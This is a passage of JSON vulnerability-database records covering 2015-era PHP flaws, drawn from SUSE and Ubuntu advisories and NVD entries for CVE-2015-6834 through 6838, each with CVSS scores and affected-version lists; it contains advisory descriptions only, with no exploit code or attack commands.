"CVE-2014-5459", "CVE-2015-4603", "CVE-2015-4599", "CVE-2016-5096", "CVE-2015-4598", "CVE-2015-8866", "CVE-2015-5589", "CVE-2016-3141", "CVE-2015-4643", "CVE-2015-8838", "CVE-2016-4346", "CVE-2015-0231", "CVE-2016-5114", "CVE-2004-1019", "CVE-2016-3142", "CVE-2015-6838", "CVE-2016-4537"], "modified": "2016-06-21T13:08:17", "id": "SUSE-SU-2016:1638-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00041.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2022-01-04T12:34:55", "description": "It was discovered that the PHP phar extension incorrectly handled certain \nfiles. A remote attacker could use this issue to cause PHP to crash, \nresulting in a denial of service. (CVE-2015-5589)\n\nIt was discovered that the PHP phar extension incorrectly handled certain \nfilepaths. A remote attacker could use this issue to cause PHP to crash, \nresulting in a denial of service, or possibly execute arbitrary code. \n(CVE-2015-5590)\n\nTaoguang Chen discovered that PHP incorrectly handled unserializing \nobjects. A remote attacker could use this issue to cause PHP to crash, \nresulting in a denial of service, or possibly execute arbitrary code. \n(CVE-2015-6831, CVE-2015-6834, CVE-2015-6835\n\nSean Heelan discovered that PHP incorrectly handled unserializing \nobjects. A remote attacker could use this issue to cause PHP to crash, \nresulting in a denial of service, or possibly execute arbitrary code. \n(CVE-2015-6832)\n\nIt was discovered that the PHP phar extension incorrectly handled certain \narchives. A remote attacker could use this issue to cause files to be \nplaced outside of the destination directory. (CVE-2015-6833)\n\nAndrea Palazzo discovered that the PHP Soap client incorrectly validated \ndata types. A remote attacker could use this issue to cause PHP to crash, \nresulting in a denial of service, or possibly execute arbitrary code. \n(CVE-2015-6836)\n\nIt was discovered that the PHP XSLTProcessor class incorrectly handled \ncertain data. A remote attacker could use this issue to cause PHP to crash, \nresulting in a denial of service. (CVE-2015-6837)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-09-30T00:00:00", "type": "ubuntu", "title": "PHP vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5590", "CVE-2015-6837", "CVE-2015-6836", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6831", "CVE-2015-6838", "CVE-2015-6833", "CVE-2015-6832", "CVE-2015-5589"], "modified": "2015-09-30T00:00:00", "id": "USN-2758-1", "href": "https://ubuntu.com/security/notices/USN-2758-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T13:36:39", "description": "The xsl_ext_function_php function in ext/xsl/xsltprocessor.c in PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13, when libxml2 before 2.9.2 is used, does not consider the possibility of a NULL valuePop return value before proceeding with a free operation during initial error checking, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted XML document, a different vulnerability than CVE-2015-6838.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-05-16T10:59:00", "type": "cve", "title": "CVE-2015-6837", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6837", "CVE-2015-6838"], "modified": "2017-11-04T01:29:00", "cpe": ["cpe:/a:xmlsoft:libxml2:2.9.1", "cpe:/a:php:php:5.5.28", "cpe:/a:php:php:5.5.8", "cpe:/a:php:php:5.6.10", "cpe:/a:php:php:5.6.4", "cpe:/a:php:php:5.5.14", "cpe:/a:php:php:5.5.6", "cpe:/a:php:php:5.5.22", "cpe:/a:php:php:5.6.1", "cpe:/a:php:php:5.5.0", "cpe:/a:php:php:5.5.5", "cpe:/a:php:php:5.6.12", "cpe:/a:php:php:5.5.27", "cpe:/a:php:php:5.5.26", "cpe:/a:php:php:5.6.0", "cpe:/a:php:php:5.5.15", "cpe:/a:php:php:5.5.7", "cpe:/a:php:php:5.6.7", "cpe:/a:php:php:5.6.9", "cpe:/a:php:php:5.5.18", "cpe:/a:php:php:5.5.4", "cpe:/a:php:php:5.5.23", "cpe:/a:php:php:5.5.17", "cpe:/a:php:php:5.5.9", "cpe:/a:php:php:5.5.24", "cpe:/a:php:php:5.6.3", "cpe:/a:php:php:5.5.20", "cpe:/a:php:php:5.6.2", "cpe:/a:php:php:5.5.13", "cpe:/a:php:php:5.5.2", "cpe:/a:php:php:5.4.44", "cpe:/a:php:php:5.5.12", "cpe:/a:php:php:5.5.3", "cpe:/a:php:php:5.5.25", "cpe:/a:php:php:5.6.11", "cpe:/a:php:php:5.5.16", "cpe:/a:php:php:5.6.8", "cpe:/a:php:php:5.5.1", "cpe:/a:php:php:5.5.19", "cpe:/a:php:php:5.6.6", "cpe:/a:php:php:5.5.10", "cpe:/a:php:php:5.5.21", "cpe:/a:php:php:5.6.5", "cpe:/a:php:php:5.5.11"], "id": "CVE-2015-6837", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6837", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.23:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.28:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.22:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.26:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.25:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.24:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha4:*:*:*:*:*:*", "cpe:2.3:a:xmlsoft:libxml2:2.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.21:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha5:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.19:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.44:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha6:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.27:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha5:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:36:40", "description": "The xsl_ext_function_php function in ext/xsl/xsltprocessor.c in PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13, when libxml2 before 2.9.2 is used, does not consider the possibility of a NULL valuePop return value before proceeding with a free operation after the principal argument loop, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted XML document, a different vulnerability than CVE-2015-6837.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-05-16T10:59:00", "type": "cve", "title": "CVE-2015-6838", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6837", "CVE-2015-6838"], "modified": "2017-11-04T01:29:00", "cpe": ["cpe:/a:xmlsoft:libxml2:2.9.1", "cpe:/a:php:php:5.5.28", "cpe:/a:php:php:5.5.8", "cpe:/a:php:php:5.6.10", "cpe:/a:php:php:5.6.4", "cpe:/a:php:php:5.5.22", "cpe:/a:php:php:5.5.6", "cpe:/a:php:php:5.5.14", "cpe:/a:php:php:5.6.1", "cpe:/a:php:php:5.5.0", "cpe:/a:php:php:5.5.5", "cpe:/a:php:php:5.6.12", "cpe:/a:php:php:5.5.27", "cpe:/a:php:php:5.5.26", "cpe:/a:php:php:5.6.0", "cpe:/a:php:php:5.5.15", "cpe:/a:php:php:5.5.7", "cpe:/a:php:php:5.6.7", "cpe:/a:php:php:5.6.9", "cpe:/a:php:php:5.5.18", "cpe:/a:php:php:5.5.4", "cpe:/a:php:php:5.5.23", "cpe:/a:php:php:5.5.17", "cpe:/a:php:php:5.5.9", "cpe:/a:php:php:5.5.24", "cpe:/a:php:php:5.6.3", "cpe:/a:php:php:5.5.20", "cpe:/a:php:php:5.6.2", "cpe:/a:php:php:5.5.13", "cpe:/a:php:php:5.5.2", "cpe:/a:php:php:5.4.44", "cpe:/a:php:php:5.5.12", "cpe:/a:php:php:5.5.3", "cpe:/a:php:php:5.5.25", "cpe:/a:php:php:5.6.11", "cpe:/a:php:php:5.5.16", "cpe:/a:php:php:5.6.8", "cpe:/a:php:php:5.5.1", "cpe:/a:php:php:5.5.19", "cpe:/a:php:php:5.6.6", "cpe:/a:php:php:5.5.10", "cpe:/a:php:php:5.5.21", "cpe:/a:php:php:5.6.5", "cpe:/a:php:php:5.5.11"], "id": "CVE-2015-6838", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6838", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.23:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.28:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.26:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.22:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.24:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.25:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha4:*:*:*:*:*:*", "cpe:2.3:a:xmlsoft:libxml2:2.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.21:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha5:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.19:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.44:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha6:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.27:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha5:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:36:36", "description": "The session deserializer in PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13 mishandles multiple php_var_unserialize calls, which allow remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via crafted session content.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-16T10:59:00", "type": "cve", "title": "CVE-2015-6835", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6835"], "modified": "2017-11-04T01:29:00", "cpe": ["cpe:/a:php:php:5.5.28", "cpe:/a:php:php:5.5.8", "cpe:/a:php:php:5.6.10", "cpe:/a:php:php:5.6.4", "cpe:/a:php:php:5.5.14", "cpe:/a:php:php:5.5.6", "cpe:/a:php:php:5.5.22", "cpe:/a:php:php:5.6.1", "cpe:/a:php:php:5.5.0", "cpe:/a:php:php:5.5.5", "cpe:/a:php:php:5.6.12", "cpe:/a:php:php:5.5.27", "cpe:/a:php:php:5.5.26", "cpe:/a:php:php:5.6.0", "cpe:/a:php:php:5.5.15", "cpe:/a:php:php:5.5.7", "cpe:/a:php:php:5.6.7", "cpe:/a:php:php:5.6.9", "cpe:/a:php:php:5.5.18", "cpe:/a:php:php:5.5.4", "cpe:/a:php:php:5.5.23", "cpe:/a:php:php:5.5.17", "cpe:/a:php:php:5.5.9", "cpe:/a:php:php:5.5.24", "cpe:/a:php:php:5.6.3", "cpe:/a:php:php:5.5.20", "cpe:/a:php:php:5.6.2", "cpe:/a:php:php:5.5.13", "cpe:/a:php:php:5.5.2", "cpe:/a:php:php:5.4.44", "cpe:/a:php:php:5.5.12", "cpe:/a:php:php:5.5.3", "cpe:/a:php:php:5.5.25", "cpe:/a:php:php:5.6.11", "cpe:/a:php:php:5.5.16", "cpe:/a:php:php:5.6.8", "cpe:/a:php:php:5.5.1", "cpe:/a:php:php:5.5.19", "cpe:/a:php:php:5.6.6", "cpe:/a:php:php:5.5.10", "cpe:/a:php:php:5.5.21", "cpe:/a:php:php:5.6.5", "cpe:/a:php:php:5.5.11"], "id": "CVE-2015-6835", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6835", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.23:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.28:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.26:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.25:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.24:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.22:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.21:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha5:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.19:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.44:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha6:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.27:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha5:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:36:33", "description": "Multiple use-after-free vulnerabilities in PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13 allow remote attackers to execute arbitrary code via vectors related to (1) the Serializable interface, (2) the SplObjectStorage class, and (3) the SplDoublyLinkedList class, which are mishandled during unserialization.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-16T10:59:00", "type": "cve", "title": "CVE-2015-6834", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834"], "modified": "2017-11-04T01:29:00", "cpe": ["cpe:/a:php:php:5.5.28", "cpe:/a:php:php:5.5.8", "cpe:/a:php:php:5.6.10", "cpe:/a:php:php:5.5.6", "cpe:/a:php:php:5.5.22", "cpe:/a:php:php:5.5.14", "cpe:/a:php:php:5.6.4", "cpe:/a:php:php:5.6.1", "cpe:/a:php:php:5.5.0", "cpe:/a:php:php:5.5.5", "cpe:/a:php:php:5.6.12", "cpe:/a:php:php:5.5.27", "cpe:/a:php:php:5.5.26", "cpe:/a:php:php:5.6.0", "cpe:/a:php:php:5.5.15", "cpe:/a:php:php:5.5.7", "cpe:/a:php:php:5.6.7", "cpe:/a:php:php:5.6.9", "cpe:/a:php:php:5.5.18", "cpe:/a:php:php:5.5.4", "cpe:/a:php:php:5.5.23", "cpe:/a:php:php:5.5.17", "cpe:/a:php:php:5.5.9", "cpe:/a:php:php:5.5.24", "cpe:/a:php:php:5.6.3", "cpe:/a:php:php:5.5.20", "cpe:/a:php:php:5.6.2", "cpe:/a:php:php:5.5.13", 